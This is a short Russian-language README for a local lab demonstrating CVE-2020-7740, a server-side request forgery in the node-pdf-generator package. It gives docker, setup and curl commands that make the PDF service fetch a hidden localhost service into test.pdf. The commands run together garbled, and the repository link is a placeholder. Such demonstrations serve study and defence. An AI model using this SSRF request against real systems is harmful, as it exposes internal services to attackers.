
Пример CVE-2020-7740
Это затрагивает все версии пакета node-pdf-generator. Из-за отсутствия проверки и очистки пользовательского ввода, передаваемого в node-pdf-generator, злоумышленник может создать URL, который будет передан внешнему серверу, что позволяет провести SSRF-атаку.
docker run -p 3000:3000 cve-2020-7740localhost:3001curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdftest.pdf, чтобы увидеть веб-сайт localhost, который должен быть скрыт.git clone {link to be inserted}https://wkhtmltopdf.org/node .\NodePdfGeneratorServer сервер будет работать на адресе localhost:3000python3 -m pip install -r requirements.txtpython3 HiddenService сервер будет работать на адресе 'localhost:3001`curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdfhttp://www.google.com в файл test.pdf